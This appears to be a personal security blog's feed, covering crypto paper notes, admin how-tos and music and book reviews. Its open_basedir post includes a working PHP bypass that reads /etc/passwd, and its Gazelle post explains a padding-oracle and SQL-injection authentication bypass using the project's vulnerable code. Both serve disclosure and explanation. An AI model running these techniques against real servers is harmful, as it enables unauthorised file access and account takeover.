+<li>Authors: Joel Kuepper, Andres Erbsen, Jason Gross, Owen Conoly, Chuyue Sun, Samuel Tian, David Wu, Adam Chlipala, Chitchanok Chuengsatiansup, Daniel Genkin, Markus Wagner, Yuval Yarom</li>
+</ul>
+<p>Cryptography is hard, high-performance one even more so: formal proof of
+assembly implementations is horrible to model, and code generated from
+formal proofs is hard to lower to high-performance assembly. The core idea of
+CryptOpt is to treat this as a black box combinatorial optimization problem,
+and bruteforce possible solutions in a smart way against an oracle.</p>
+<p>More precisely:</p>
+<ol>
+<li>start from a known-correct implementation in
+ <a href="https://github.com/mit-plv/fiat-crypto">fiat-crypto</a> (a
+ coq-powered high-level to low-level IR proven translator) low-level IR;</li>
+<li>lower it via a fuzzer-like machinery replacing/reordering operands
+ applying semantics-and-data-constraints-preserving transformations, which has an acceptable
+ search space because:<ul>
+<li>it's straight-line no-aliasing constant-offset-pointers assembly;</li>
+<li>transformations can be templatised, eg. <code>add ≍ clc; adcx</code>;</li>
+</ul>
+</li>
+<li>lift the resulting x64 assembly to fiat-crypto low-level IR;</li>
+<li>use a custom <a href="https://en.wikipedia.org/wiki/E-graph">e-graph</a> based
+ <em>equivalence checker</em> implemented as a mix between an SMT solver and a symbolic-execution engine;</li>
+<li>if the new implementation is correct, benchmark it against the current
+ fastest one, and keep it if it's outperforming it;</li>
+<li><code>goto 2</code>.</li>
+</ol>
+<p>This approach has a couple of advantages:</p>
+<ul>
+<li>fuzzers are cheaper than highly specialised engineering time</li>
+<li>porting implementations to new hardware is simply a matter of
+ running CryptOpt on it.</li>
+<li>by lifting the assembly to fiat-crypto low-level IR,
+ there is no need to write complex formal proofs,
+ since fiat-crypto is already taking care of those.</li>
+<li>controlling the mutations allows to ensure that
+ the implementation stays side-channel free.</li>
+</ul>
+<p>The main issue though, is that one needs to formally implement
+whatever algorithm to optimize in fiat-crypto, which is not that easy (and
+which the authors of the paper didn't do for libsecp256k1).</p>
+<p>Implementation-wise, the authors ran 200k mutations, with 20 initial candidates,
+over 18 Fiat IR primitives, taking between 20 and 40 CPU hours. Interestingly,
+since the equivalence-based verification is <em>slow</em> (between 0.1s and ~300s),
+it's only done once at the end. They found out that "optimization progress is roughly logarithmic
+in the number of mutations." CryptOpt generates code around 1.20 to 2.50 times
+faster than gcc/clang for the same fiat-crypto generated C code. It's not
+faster than OpenSSL (but offers formally verified correctness), but is
+faster than libsecp256k1.</p>
+<p>The paper was <a href="https://iacr.org/submit/files/slides/2023/rwc/rwc2023/85/slides.pdf">presented</a> at <a href="https://rwc.iacr.org/2023/program.php">Real World Crypto 2023</a>,
+and like all good ones, it came with an <a href="https://github.com/0xADE1A1DE/CryptOpt">implementation</a></p>Managing a bouncer via OpenRC2023-11-24T16:30:00+01:002023-11-24T16:30:00+01:00jvoisintag:dustri.org,2023-11-24:/b/managing-a-bouncer-via-openrc.html<p>I'm an avid <a href="https://en.wikipedia.org/wiki/Internet_Relay_Chat">IRC</a>
+user, and I'm using <a href="https://en.wikipedia.org/wiki/XMPP">XMPP</a> to idle on
+<a href="https://tails.net/support/index.en.html">Tails</a>' chatrooms. Since protocols
+tend to only work when one is connected, they're both running inside a
+<a href="https://github.com/tmux/tmux">tmux</a> session, acting as a
+<a href="https://en.wikipedia.org/wiki/BNC_(software)">bouncer</a>.
+But now that my hypervisor is automatically rebooting to apply security updates,
+and during power …</p><p>I'm an avid <a href="https://en.wikipedia.org/wiki/Internet_Relay_Chat">IRC</a>
+user, and I'm using <a href="https://en.wikipedia.org/wiki/XMPP">XMPP</a> to idle on
+<a href="https://tails.net/support/index.en.html">Tails</a>' chatrooms. Since protocols
+tend to only work when one is connected, they're both running inside a
+<a href="https://github.com/tmux/tmux">tmux</a> session, acting as a
+<a href="https://en.wikipedia.org/wiki/BNC_(software)">bouncer</a>.
+But now that my hypervisor is automatically rebooting to apply security updates,
+and during power cuts via <a href="https://networkupstools.org/">nut</a>,
+I needed a way to automatically restart the bouncer. Since
+it's running in an <a href="https://www.alpinelinux.org/">Alpine Linux</a> container,
+here is my solution in the form of an <a href="https://github.com/OpenRC/openrc">OpenRC</a>
+service script, because I couldn't find one on the internet:</p>
+<div class="codehilite"><pre><span></span><code><span class="ch">#!/sbin/openrc-run</span>
+
+<span class="nv">USER</span><span class="o">=</span>jvoisin
+
+<span class="nv">name</span><span class="o">=</span><span class="s2">"chat"</span>
+<span class="nv">command_user</span><span class="o">=</span><span class="s2">"</span><span class="nv">$USER</span><span class="s2">"</span>
+<span class="nv">command</span><span class="o">=</span>/usr/bin/tmux
+<span class="nv">command_args</span><span class="o">=</span><span class="s2">"new-session -s chat -d '/usr/bin/weechat' \; new-window '/usr/bin/profanity' \; select-window -t -1"</span>
+<span class="nv">pidfile</span><span class="o">=</span><span class="s2">"/run/</span><span class="nv">$SVCNAME</span><span class="s2">.pid"</span>
+
+depend<span class="o">()</span><span class="w"> </span><span class="o">{</span>
+<span class="w"> </span>need<span class="w"> </span>net
+<span class="w"> </span>use<span class="w"> </span>dns<span class="w"> </span>
+<span class="o">}</span><span class="w"> </span>
+
+stop<span class="o">()</span><span class="w"> </span><span class="o">{</span>
+<span class="w"> </span>su<span class="w"> </span><span class="s2">"</span><span class="nv">$USER</span><span class="s2">"</span><span class="w"> </span>-c<span class="w"> </span><span class="s1">'tmux kill-session chat'</span>
+<span class="o">}</span>
+</code></pre></div>Netra - Ingrats2023-11-18T22:45:00+01:002023-11-18T22:45:00+01:00jvoisintag:dustri.org,2023-11-18:/b/netra-ingrats.html<p><a href="https://hypnoticdirgerecords.bandcamp.com/album/ingrats"><img alt="Cover" src="https://dustri.org/b/images/netra_ingrats.jpg"></a></p>
+<p><em>Ingrats</em> ("ungrateful ones" in French) is the 3<sup>rd</sup> album from
+Netra, and it's a very lonely one, for I don't think it has any peers. A mix of
+depressive black metal, trip hop, and jazz à la <a href="https://en.wikipedia.org/wiki/Bohren_%26_der_Club_of_Gore">Bohren & der Club of
+Gore</a> in equal
+measures, bound together with a …</p><p><a href="https://hypnoticdirgerecords.bandcamp.com/album/ingrats"><img alt="Cover" src="https://dustri.org/b/images/netra_ingrats.jpg"></a></p>
+<p><em>Ingrats</em> ("ungrateful ones" in French) is the 3<sup>rd</sup> album from
+Netra, and it's a very lonely one, for I don't think it has any peers. A mix of
+depressive black metal, trip hop, and jazz à la <a href="https://en.wikipedia.org/wiki/Bohren_%26_der_Club_of_Gore">Bohren & der Club of
+Gore</a> in equal
+measures, bound together with a hint of depressive darkwave, resulting
+in a not only surprisingly cohesive and daring record, but also an excessively
+pleasant and honest one.</p>
+<p>Opening with "Gimme a break", a mellow jazzy noir blues vibe where one wants to
+snap in rhythm, things quickly devolve into blast beats, raw screams and
+twisted guitar of "Everything’s Fine", arguably the most black-metal-esque song
+of the album. Albeit it is way more than yet-another-black-metal-track,
+morphing into something more complex, with an eerie piano melody, and some
+almost gothic rock clear singing. The sudden transitions are perfectly
+executed, and the work on the voices is truly delicious, resulting in an
+alienating, impetuous yet melancholic track. "Underneath my words the ruins of
+yours" is a subtle mix of trip-hop and atmospheric post-rock/darkwave,
+pursuing with "Live with It", even more trip-hop, but this time with a
+<a href="https://en.wikipedia.org/wiki/Syncopation">syncopated</a> rhythm, 80s gothic
+rock, clean vocals and acoustic guitars, … it results in something like
+Katatonia doing a feat with <a href="https://en.wikipedia.org/wiki/Gramatik">Gramatik</a>
+and <a href="https://en.wikipedia.org/wiki/Ulver">Ulver</a> period early 2000s.</p>
+<p>Then the calm before the storm, "Infinite boredom", a one minute interlude of grainy piano under the rain,
+announcing "Don't Keep Me Waiting", some sort of nihilist black metal track,
+but with the noted presence of a saxophone and some clear touches of jazz. The presence of a whispered sample
+from <a href="https://en.wikipedia.org/wiki/The_Minister">L’exercice de l’État</a>
+has a gentle touch of <a href="https://www.metal-archives.com/bands/B%C3%A2%27a/3540445572">Ba'a</a>. Moving on
+to "A Genuinely Benevolent Man", starting with synthesisers,
+then a 4|4 kick resulting in something that could be on a <a href="https://en.wikipedia.org/wiki/VNV_Nation">VNV Nation</a> album.
+Until it decays into something more raw, and when the shrieking vocals
+are showing up, you didn't even realise that we've left the world of the darkwave
+to return into the one of black metal.</p>
+<p>"Paris or Me", dark and rainy, with bits of trip-hop percussion,
+introducing "Could've, Should've, Would've", with tasteful hints of Depeche Mode, Dead Can Dance,
+post-2000 Velvet Acid Christ, giving it a resolute tasteful darkwave-synth-pop-EBM
+cocktail. The album ends with "Jusqu'au-boutiste", starting with some jazzy piano on a <a href="https://en.wikipedia.org/wiki/Bassline#Walking_bass">walking
+bass</a>, turning into an ultra-saturated tremolo riff with blast beats,
+and both worlds are alternating along the track, only interrupted by a very à
+propos sample from <a href="https://en.wikipedia.org/wiki/Low_Down">Low Down</a>. It goes
+on until the piano gets creepier and creepier, landing into strings,
+morphing into dislocated trip-hop soul, beaching onto calm synthesisers,
+and ending with raw black metal as background for electronic sounds.</p>
+<p>As <a href="https://hypnoticdirgerecords.com/">Hypnotic Dirge Records</a>, the label on which the disc was produced, perfectly
+summarised:</p>
+<blockquote>
+<p>The perfect soundtrack for late-night walks in the city. The material on
+“Ingrats” is an all-out assault on the senses, a bitter pill that must be
+swallowed as an accompaniment for self-reflection. An album which can connect
+emotionally and leave you drained at the end.</p>
+</blockquote>ini_set based open_basedir bypass2023-11-03T16:30:00+01:002023-11-03T16:30:00+01:00jvoisintag:dustri.org,2023-11-03:/b/ini_set-based-open_basedir-bypass.html<p>This one was burned by <a href="https://twitter.com/Blaklis_">Blaklis</a> in 2019,
+by being the expected solution for his
+<a href="https://github.com/Blaklis/my-challenges/tree/master/phuck3">Phuck3</a> challenge
+for InsomniHack Finals 2019, but has been known long before.</p>
+<p>In the words of <a href="https://www.php.net/manual/en/ini.core.php#ini.open-basedir">PHP's documentation</a> on <code>open_basedir</code>:</p>
+<blockquote>
+<p>When a script tries to access the filesystem, for example using include,
+or fopen(), the …</p></blockquote><p>This one was burned by <a href="https://twitter.com/Blaklis_">Blaklis</a> in 2019,
+by being the expected solution for his
+<a href="https://github.com/Blaklis/my-challenges/tree/master/phuck3">Phuck3</a> challenge
+for InsomniHack Finals 2019, but has been known long before.</p>
+<p>In the words of <a href="https://www.php.net/manual/en/ini.core.php#ini.open-basedir">PHP's documentation</a> on <code>open_basedir</code>:</p>
+<blockquote>
+<p>When a script tries to access the filesystem, for example using include,
+or fopen(), the location of the file is checked. When the file is outside the
+specified directory-tree, PHP will refuse to access it. All symbolic links are
+resolved, so it's not possible to avoid this restriction with a symlink. If the
+file doesn't exist then the symlink couldn't be resolved and the filename is
+compared to (a resolved) open_basedir. </p>
+<p>[…]</p>
+<p>open_basedir is just an extra safety net, that is in no way comprehensive, and can therefore not be relied upon when security is needed. </p>
+</blockquote>
+<p>It has been more or less fixed in <a href="https://github.com/php/php-src/commit/ee9e07541f9f07762e3ee781102eea3a4190787c">March 2021</a>,
+then again in <a href="https://github.com/php/php-src/commit/61e98bf35eb939bdd7b27ad7938f8549db2e1551">March 2023</a>,
+and again in <a href="https://github.com/php/php-src/commit/9bcdf219ec6e8d6c2a55f1712b7d868b9129ef8d">July 2023</a>.
+But I wouldn't be surprised if more low-hanging bypasses were lurking ;)</p>
+<p>The crux of the bypass is that php didn't resolve relative paths both in
+<code>ini_set</code> and when checking <code>php_check_open_basedir</code>:</p>
+<div class="codehilite"><pre><span></span><code><span class="o"><?</span><span class="nx">php</span>
+<span class="k">echo</span> <span class="nb">ini_get</span><span class="p">(</span><span class="s1">'open_basedir'</span><span class="p">);</span> <span class="c1">// /var/www/html</span>
+<span class="nb">mkdir</span><span class="p">(</span><span class="s1">'./tmp'</span><span class="p">);</span>
+<span class="nb">chdir</span><span class="p">(</span><span class="s1">'./tmp'</span><span class="p">);</span>
+<span class="nb">ini_set</span><span class="p">(</span><span class="s1">'open_basedir'</span><span class="p">,</span> <span class="s1">'..'</span><span class="p">);</span>
+<span class="k">for</span> <span class="p">(</span><span class="nv">$i</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> <span class="nv">$i</span> <span class="o"><=</span> <span class="mi">24</span><span class="p">;</span> <span class="nv">$i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
+ <span class="nb">chdir</span><span class="p">(</span><span class="s1">'..'</span><span class="p">);</span>
+<span class="p">}</span>
+<span class="nb">ini_set</span><span class="p">(</span><span class="s1">'open_basedir'</span><span class="p">,</span><span class="s1">'/'</span><span class="p">)</span>
+<span class="k">echo</span> <span class="nb">file_get_contents</span><span class="p">(</span><span class="s2">"/etc/passwd"</span><span class="p">);</span>
+</code></pre></div>Book review: Locksport - A Hacker’s Guide to Lockpicking, Impressioning, and Safe Cracking2023-10-20T18:00:00+02:002023-10-20T18:00:00+02:00jvoisintag:dustri.org,2023-10-20:/b/book-review-locksport-a-hackers-guide-to-lockpicking-impressioning-and-safe-cracking.html<p><a href="https://nostarch.com/locksport"><img alt="Locksport's cover" src="https://dustri.org/b/images/locksport.png"></a></p>
+<p>I'm starting to feel guilty about getting ebooks for free from
+<a href="https://nostarch.com/about">No Starch Press</a>, but apparently they're happy to
+send them my way in exchange for a review, so I won't complain.</p>
+<p>Anyway, I got a copy of the early access version <a href="https://nostarch.com/locksport">Locksport - A Hacker’s Guide to Lockpicking,
+Impressioning …</a></p><p><a href="https://nostarch.com/locksport"><img alt="Locksport's cover" src="https://dustri.org/b/images/locksport.png"></a></p>
+<p>I'm starting to feel guilty about getting ebooks for free from
+<a href="https://nostarch.com/about">No Starch Press</a>, but apparently they're happy to
+send them my way in exchange for a review, so I won't complain.</p>
+<p>Anyway, I got a copy of the early access version <a href="https://nostarch.com/locksport">Locksport - A Hacker’s Guide to Lockpicking,
+Impressioning, and Safe Cracking</a>!
+It's obviously a book about lockpicking, but, as <em>hinted</em> by its name,
+from the <a href="https://www.lockwiki.com/index.php/Locksport">sport</a> angle.</p>
+<p>I'm not completely clueless when it comes to picking locks, but I've always been
+mediocre at best, since I never really put the effort into practising anything
+but the basics. This was thus a great opportunity for a deeper dive!
+So I got myself a <a href="https://covertinstruments.com/collections/lockpicks/products/genesis-lock-pick">proper set of picks</a>,
+3 cutaway training locks <a href="https://www.sparrowslockpicks.com/products/cut-away-lock-serrated-pins">one with serrated pins</a>,
+<a href="https://www.sparrowslockpicks.com/products/cut-away-lock-spool-pins">with spool pins</a>,
+and <a href="https://www.sparrowslockpicks.com/products/cut-away-lock-check-pins">one with stupid chess pieces pins</a>,
+and a couple of locks/padlocks from my local locksmith, and dove into the book!</p>
+<p>I was a bit curious about its content, since I didn't bother reading the table of contents,
+and was expecting a pile of techniques to open <a href="https://en.wikipedia.org/wiki/Wafer_tumbler_lock">wafer tumbler locks</a>
+in the fastest way possible. But the book is so much more than that, with
+historical perspectives, a bit of legalese, the proper etiquette to participate in lockpicking
+competitions and how to organise one, anecdotes, mechanical details and
+resources for those who <a href="https://en.wikipedia.org/wiki/Starship_Troopers_(film)">would like to know
+more</a>, how to tear
+apart, modify, take care of, and reassemble locks, where to get equipment,
+how to <a href="https://www.lockwiki.com/index.php/Impressioning">impression keys</a>,
+details on <a href="https://en.wikipedia.org/wiki/Lever_tumbler_lock">lever tumbler locks</a>
+and <a href="https://en.wikipedia.org/wiki/Safe">vaults</a>,
+…</p>
+<p>The part about wafer locks, while interesting, doesn't really go much further
+than some basic techniques for entry-level <a href="https://lockwiki.com/index.php/Security_pin#Security_pin_illustrations">security pins</a>,
+but I guess practise is the only way to learn how to handle anything non-trivial anyway.
+On the other hand, the part about lever locks was highly entertaining,
+since those are really weird compared to the <em>usual</em> locks,
+and I didn't know much about them.</p>
+<p>I recently gifted myself a <a href="https://www.sparrowslockpicks.com/products/challenge-vault">Sparrow's challenge vault</a> for my birthday,
+and was thus highly delighted to discover that the book has a whole section
+on <a href="https://en.wikipedia.org/wiki/Safe-cracking">safe manipulation</a>; which is
+fortunate since the instructions coming with the vault are <s>pure garbage</s>
+confusing at best.</p>
+<p>The only issue I had with the book is that while it's full of gorgeous colourful
+pictures, like the small marks left by pins during key impressioning,
+they are unfortunately barely legible on my
+<a href="https://www.pocketbook-int.com/ge/products/pocketbook-inkpad-3">Pocketbook InkPad 3</a>,
+so I'd recommend getting the paperback version if you don't have a 𝖙𝖗𝖚𝖊𝖈𝖔𝖑𝖔𝖗 4𝖐
+𝕳𝕯𝕽 e-reader.</p>
+<p>All in all, it's a really great self-contained book for newcomers and beginners,
+entertaining, detailed, … and doing a tremendous job at making
+lockpicking competitions look cool yet accessible! It was also a nice motivation booster for me to
+tackle harder locks.</p>
+<p>If you already know your way around locks, you might want to look at <a href="https://www.barnesandnoble.com/w/high-security-mechanical-locks-graham-pulford/1111341233">High-Security Mechanical Locks: An
+Encyclopedic
+Reference</a> instead.</p>Authentication bypass on What.CD's Gazelle2023-10-13T19:45:00+02:002023-10-13T19:45:00+02:00jvoisintag:dustri.org,2023-10-13:/b/authentication-bypass-on-whatcds-gazelle.html<p><a href="https://en.wikipedia.org/wiki/What.CD">What.CD</a> has been dead since 2016, and
+hopefully <a href="https://github.com/OPSnet/Gazelle/blob/master/app/Util/Crypto.php">nobody</a>
+is using <a href="https://github.com/WhatCD/Gazelle">Gazelle</a>,
+their "web framework geared towards private BitTorrent tracker" anymore.
+I've been sitting on this one for years, I know I wasn't the only one,
+and it's not the only low-hanging vulnerability lurking there.</p>
+<p>Rolling your own blunt …</p><p><a href="https://en.wikipedia.org/wiki/What.CD">What.CD</a> has been dead since 2016, and
+hopefully <a href="https://github.com/OPSnet/Gazelle/blob/master/app/Util/Crypto.php">nobody</a>
+is using <a href="https://github.com/WhatCD/Gazelle">Gazelle</a>,
+their "web framework geared towards private BitTorrent tracker" anymore.
+I've been sitting on this one for years, I know I wasn't the only one,
+and it's not the only low-hanging vulnerability lurking there.</p>
+<p>Rolling your own blunt is alright, rolling your own authentication scheme
+less so: there is a trivial <a href="https://en.wikipedia.org/wiki/Padding_oracle_attack">padding oracle</a>
+in the <a href="https://github.com/WhatCD/Gazelle/blob/master/classes/encrypt.class.php#L24">homegrown crypto scheme</a>:</p>
+<div class="codehilite"><pre><span></span><code><span class="k">public</span> <span class="k">function</span> <span class="nf">decrypt</span><span class="p">(</span><span class="nv">$CryptStr</span><span class="p">,</span> <span class="nv">$Key</span> <span class="o">=</span> <span class="nx">ENCKEY</span><span class="p">)</span> <span class="p">{</span>
+ <span class="k">if</span> <span class="p">(</span><span class="nv">$CryptStr</span> <span class="o">!=</span> <span class="s1">''</span><span class="p">)</span> <span class="p">{</span>
+ <span class="nv">$IV</span> <span class="o">=</span> <span class="nb">substr</span><span class="p">(</span><span class="nb">base64_decode</span><span class="p">(</span><span class="nv">$CryptStr</span><span class="p">),</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">16</span><span class="p">);</span>
+ <span class="nv">$CryptStr</span> <span class="o">=</span> <span class="nb">substr</span><span class="p">(</span><span class="nb">base64_decode</span><span class="p">(</span><span class="nv">$CryptStr</span><span class="p">),</span> <span class="mi">16</span><span class="p">);</span>
+ <span class="k">return</span> <span class="nb">trim</span><span class="p">(</span><span class="nb">mcrypt_decrypt</span><span class="p">(</span><span class="nx">MCRYPT_RIJNDAEL_128</span><span class="p">,</span> <span class="nv">$Key</span><span class="p">,</span> <span class="nv">$CryptStr</span><span class="p">,</span> <span class="nx">MCRYPT_MODE_CBC</span><span class="p">,</span> <span class="nv">$IV</span><span class="p">));</span>
+ <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
+ <span class="k">return</span> <span class="s1">''</span><span class="p">;</span>
+ <span class="p">}</span>
+<span class="p">}</span>
+</code></pre></div>
+
+<p>leading to an <a href="https://github.com/WhatCD/Gazelle/blob/master/classes/ajax_start.php#L23-L31">authentication bypass via a SQL injection</a>:</p>
+<div class="codehilite"><pre><span></span><code><span class="k">if</span> <span class="p">(</span><span class="nb">isset</span><span class="p">(</span><span class="nv">$_COOKIE</span><span class="p">[</span><span class="s1">'session'</span><span class="p">]))</span> <span class="p">{</span>
+ <span class="nv">$LoginCookie</span> <span class="o">=</span> <span class="nv">$Enc</span><span class="o">-></span><span class="na">decrypt</span><span class="p">(</span><span class="nv">$_COOKIE</span><span class="p">[</span><span class="s1">'session'</span><span class="p">]);</span>
+<span class="p">}</span>
+<span class="k">if</span> <span class="p">(</span><span class="nb">isset</span><span class="p">(</span><span class="nv">$LoginCookie</span><span class="p">))</span> <span class="p">{</span>
+ <span class="k">list</span><span class="p">(</span><span class="nv">$SessionID</span><span class="p">,</span> <span class="nv">$UserID</span><span class="p">)</span> <span class="o">=</span> <span class="nb">explode</span><span class="p">(</span><span class="s2">"|~|"</span><span class="p">,</span> <span class="nv">$Enc</span><span class="o">-></span><span class="na">decrypt</span><span class="p">(</span><span class="nv">$LoginCookie</span><span class="p">));</span>
+
+ <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nv">$UserID</span> <span class="o">||</span> <span class="o">!</span><span class="nv">$SessionID</span><span class="p">)</span> <span class="p">{</span>
+ <span class="k">die</span><span class="p">(</span><span class="s1">'Not logged in!'</span><span class="p">);</span>
+ <span class="p">}</span>
+
+ <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nv">$Enabled</span> <span class="o">=</span> <span class="nv">$Cache</span><span class="o">-></span><span class="na">get_value</span><span class="p">(</span><span class="s2">"enabled_</span><span class="si">$UserID</span><span class="s2">"</span><span class="p">))</span> <span class="p">{</span>
+ <span class="k">require</span><span class="p">(</span><span class="nx">SERVER_ROOT</span><span class="o">.</span><span class="s1">'/classes/mysql.class.php'</span><span class="p">);</span> <span class="c1">//Require the database wrapper</span>
+ <span class="nv">$DB</span> <span class="o">=</span> <span class="k">NEW</span> <span class="nx">DB_MYSQL</span><span class="p">;</span> <span class="c1">//Load the database wrapper</span>
+ <span class="nv">$DB</span><span class="o">-></span><span class="na">query</span><span class="p">(</span><span class="s2">"</span>
+<span class="s2"> SELECT Enabled</span>
+<span class="s2"> FROM users_main</span>
+<span class="s2"> WHERE ID = '</span><span class="si">$UserID</span><span class="s2">'"</span><span class="p">);</span>
+ <span class="k">list</span><span class="p">(</span><span class="nv">$Enabled</span><span class="p">)</span> <span class="o">=</span> <span class="nv">$DB</span><span class="o">-></span><span class="na">next_record</span><span class="p">();</span>
+ <span class="nv">$Cache</span><span class="o">-></span><span class="na">cache_value</span><span class="p">(</span><span class="s2">"enabled_</span><span class="si">$UserID</span><span class="s2">"</span><span class="p">,</span> <span class="nv">$Enabled</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
+ <span class="p">}</span>
+<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
+ <span class="k">die</span><span class="p">(</span><span class="s1">'Not logged in!'</span><span class="p">);</span>
+<span class="p">}</span>
+</code></pre></div>
+
+<p>Conveniently, the oracle doesn't touch the database, is completely stateless,
+and only shows up in the httpd/reverse-proxy's logs, which shouldn't log the cookies'
+content, making forensic analysis nigh impossible. Once you're admin, there are
+a bunch of available SQL injections, like in
+<a href="https://github.com/WhatCD/Gazelle/blob/master/sections/reportsv2/takeresolve.php"><code>takeresolve.php</code></a>.
+From there, remote code execution is doable, but left as an exercise for the
+reader.</p>Video acceleration in Jellyfin inside a Proxmox container2023-10-01T22:15:00+02:002023-10-01T22:15:00+02:00jvoisintag:dustri.org,2023-10-01:/b/video-acceleration-in-jellyfin-inside-a-proxmox-container.html<p>For various reasons, including "video decoding is hard", "your web browser hates you"
+and "watching movies on a phone over 3G is a basic human necessity",
+enabling hardware-accelerated video decoding in <a href="https://jellyfin.org">Jellyfin</a>
+is a desirable goal if you don't want your CPU to set your house on fire. </p>
+<p>To attain …</p><p>For various reasons, including "video decoding is hard", "your web browser hates you"
+and "watching movies on a phone over 3G is a basic human necessity",
+enabling hardware-accelerated video decoding in <a href="https://jellyfin.org">Jellyfin</a>
+is a desirable goal if you don't want your CPU to set your house on fire. </p>
+<p>To attain it, one can mess around <a href="https://github.com/ddimick/proxmox-lxc-idmapper">cryptic gid mappings</a>,
+but granting every user on the hypervisor the right to read/write <code>/dev/dri/renderD128</code> and
+<code>/dev/dri/card0</code> is way easier, and it looks like this:</p>
+<div class="codehilite"><pre><span></span><code><span class="gp"># </span>cat<span class="w"> </span>><span class="w"> </span>/etc/udev/rules.d/99-intel-chmod666.rules<span class="w"> </span><<<span class="w"> </span><span class="s1">'EOF'</span>
+<span class="go">KERNEL=="renderD128", MODE="0666"</span>
+<span class="go">KERNEL=="card0", MODE="0666"</span>
+<span class="go">EOF</span>
+<span class="gp"># </span>udevadm<span class="w"> </span>control<span class="w"> </span>--reload-rules<span class="w"> </span><span class="o">&&</span><span class="w"> </span>udevadm<span class="w"> </span>trigger
+<span class="gp">#</span>
+</code></pre></div>
+
+<p>It doesn't really worsen security, since:
+- the devices are only mounted inside my jellyfin container, which would have
+ the same privileges as if I used gid mapping.
+- odds are that an attacker able to get a shell on the hypervisor wouldn't
+ really need to have r/w access to the two devices to escalate their
+ privileges anyway, since they would either be:
+ - root already to escape from a container
+ - root already to escape from a vm
+ - whatever proxmox user and likely able to escalate to <code>root</code> trivially
+ - other users are sandboxed via systemd and/or seccomp.</p>
+<p>Speaking of mounting things inside the container:</p>
+<div class="codehilite"><pre><span></span><code><span class="gp"># </span>cat<span class="w"> </span>><span class="w"> </span>/etc/pve/lxc/114.conf<span class="w"> </span><<<span class="w"> </span><span class="s1">'EOF'</span>
+<span class="go">lxc.cgroup2.devices.allow: c 226:0 rwm</span>
+<span class="go">lxc.cgroup2.devices.allow: c 226:128 rwm</span>
+<span class="go">lxc.mount.entry: /dev/dri dev/dri none bind,optional,create=dir</span>
+<span class="go">lxc.mount.entry: /dev/dri/renderD128 dev/renderD128 none bind,optional,create=file</span>
+<span class="go">EOF</span>
+<span class="gp">#</span>
+</code></pre></div>
+
+<p>You can now run <code>vainfo</code> inside the container and be delighted by the
+presence of the <a href="https://en.wikipedia.org/wiki/Video_Acceleration_API">VA-API</a> version number:</p>
+<div class="codehilite"><pre><span></span><code><span class="gp"># </span>vainfo<span class="w"> </span><span class="m">2</span>>/dev/null<span class="w"> </span><span class="p">|</span><span class="w"> </span>head<span class="w"> </span>-n<span class="w"> </span><span class="m">1</span>
+<span class="go">libva info: VA-API version 1.17.0</span>
+<span class="gp">#</span>
+</code></pre></div>
+
+<p>The last step is to tick all the boxes in <a href="https://jellyfin.org/docs/general/administration/hardware-acceleration/">Jellyfin's
+preferences</a>
+and you're good to go. Don't forget to make some space on the disk for the
+transcoding cache, at least until <a href="https://github.com/jellyfin/jellyfin/pull/8744">this</a>
+makes its way into a release.</p>Paper notes: Breaking Bad: Quantifying the Addiction of Web Elements to JavaScript2023-09-26T17:15:00+02:002023-09-26T17:15:00+02:00jvoisintag:dustri.org,2023-09-26:/b/paper-notes-breaking-bad-quantifying-the-addiction-of-web-elements-to-javascript.html<p><a href="https://arxiv.org/pdf/2301.10597.pdf">PDF</a>, <a href="https://dustri.org/b/files/papers/breaking_bad.pdf">local mirror</a></p>
+<p>More or less all conversations involving the <a href="https://www.torproject.org/download/">tor browser</a>
+will at some point contain the following line: "No, javascript isn't disabled
+by default because too many sites would break. You can always crank the
+security slider all the way up if you want tho."</p>
+<p>We all agree …</p><p><a href="https://arxiv.org/pdf/2301.10597.pdf">PDF</a>, <a href="https://dustri.org/b/files/papers/breaking_bad.pdf">local mirror</a></p>
+<p>More or less all conversations involving the <a href="https://www.torproject.org/download/">tor browser</a>
+will at some point contain the following line: "No, javascript isn't disabled
+by default because too many sites would break. You can always crank the
+security slider all the way up if you want tho."</p>
+<p>We all agree that javascript enables all sorts of despicable behaviours making
+the web a nightmare-material privacy/security cesspit and completely
+inscrutable to a lot of users, so having research done
+to quantify how to make it a better place for everyone is always more than welcome.</p>
+<p>The main idea of the paper is to load pages from the <a href="https://hispar.cs.duke.edu/">Hispar
+set</a> with and without <code>javascript.enabled</code> set,
+via <a href="https://pptr.dev">Puppeteer</a>, and to perform
+magic human-assisted smart diffing to detect user-perceived/perceivable
+breakages. </p>
+<p>The paper is full of fancy graphs and analysis, but the <a href="https://en.wikipedia.org/wiki/TL;DR">tldr</a> is:</p>
+<blockquote>
+<p>We discover that 43 % of web pages are not strictly dependent on JavaScript
+and that more than 67 % of pages are likely to be usable as long as the visitor
+only requires the content from the main section of the page, for which the user
+most likely reached the page, while reducing the number of tracking requests by
+85 % on average.</p>
+</blockquote>
+<p>An interesting take is that the usage of javascript frameworks is the main
+source of breakage, since <s>a lot</s> all of them result in completely
+unusable websites when javascript is disabled. Moreover, anecdotal data seems
+to suggest that the bigger a company is, the more their website is going to
+break when javascript is disabled.</p>
+<p>And like every decent paper, it comes with the <a href="https://gitlab.inria.fr/Spirals/breaking-bad">related code and data published</a>.</p>Snuffleupagus 0.10.0 - Babar the Elephant2023-09-20T15:25:00+02:002023-09-20T15:25:00+02:00jvoisintag:dustri.org,2023-09-20:/b/snuffleupagus-0100-babar-the-elephant.html<p><a href="https://snuffleupagus.readthedocs.org"><img alt="snuffleupagus logo" src="https://dustri.org/b/images/sp.png"></a></p>
+<p>I just published a new release of
+<a href="https://github.com/jvoisin/snuffleupagus/releases/tag/v0.10.0">Snuffleupagus</a>,
+the hardening module for php7+ and php8+,
+version <code>0.10.0</code>, codename "Babar the Elephant",
+named after the <a href="https://en.wikipedia.org/wiki/Babar_the_Elephant">eponymous character</a>.
+The main new feature is the PHP8.3 support, but there are a couple of
+quality-of-life improvements for people using Snuffleupagus with fuzzers …</p><p><a href="https://snuffleupagus.readthedocs.org"><img alt="snuffleupagus logo" src="https://dustri.org/b/images/sp.png"></a></p>
+<p>I just published a new release of
+<a href="https://github.com/jvoisin/snuffleupagus/releases/tag/v0.10.0">Snuffleupagus</a>,
+the hardening module for php7+ and php8+,
